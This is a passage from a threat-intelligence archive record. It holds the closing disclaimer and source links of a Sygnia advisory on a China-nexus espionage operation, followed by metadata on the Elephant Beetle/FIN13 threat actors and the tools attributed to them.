at\r\ncontact@sygnia.co or our 24-hour hotline +1-877-686-8680.\r\nThis advisory and any information or recommendation contained herein has been prepared for general informational\r\npurposes and is not intended to be used as a substitute for professional consultation on facts and circumstances specific to\r\nany entity. While we have made attempts to ensure the information contained herein has been obtained from reliable sources\r\nand to perform rigorous analysis, this advisory is based on initial rapid study, and needs to be treated accordingly. Sygnia is\r\nnot responsible for any errors or omissions, or for the results obtained from the use of this Advisory. This Advisory is\r\nprovided on an as-is basis, and without warranties of any kind. \r\nSource: https://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nhttps://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sygnia.co/threat-reports-and-advisories/weaver-ant-tracking-a-china-nexus-cyber-espionage-operation/" ], "report_names": [ "weaver-ant-tracking-a-china-nexus-cyber-espionage-operation" ], "threat_actors": [ { "id": "50b43f44-b93c-4377-82bc-d6e9c7ef5ee6", "created_at": "2022-10-25T16:07:23.573424Z", "updated_at": "2026-04-10T02:00:04.673762Z", "deleted_at": null, "main_name": "Elephant Beetle", "aliases": [ "TG2003" ], "source_name": "ETDA:Elephant Beetle", "tools": [ "JSPSPY", "MiniWebCmdShell", "jsp File browser", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "7aa1288a-61ec-4793-b543-9fedc26b9b03", "created_at": "2023-11-01T02:01:06.805323Z", "updated_at": "2026-04-10T02:00:05.331884Z", "deleted_at": null, "main_name": "FIN13", "aliases": [ "FIN13", "Elephant Beetle" ], "source_name": "MITRE:FIN13", "tools": [ "Impacket", "Mimikatz", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "f57e32ac-9f90-471d-93ba-7f6d8b05e6c1", "created_at": "2023-01-06T13:46:39.29882Z", "updated_at": "2026-04-10T02:00:03.279184Z", "deleted_at": null, "main_name": "FIN13", "aliases": [ "TG2003", "Elephant Beetle" ], "source_name": "MISPGALAXY:FIN13", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434228, "ts_updated_at": 1775791858, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0715c757741fd80fc79462a363e87eade6fadcd7.pdf", "text": "https://archive.orkl.eu/0715c757741fd80fc79462a363e87eade6fadcd7.txt", "img": "https://archive.orkl.eu/0715c757741fd80fc79462a363e87eade6fadcd7.jpg" } }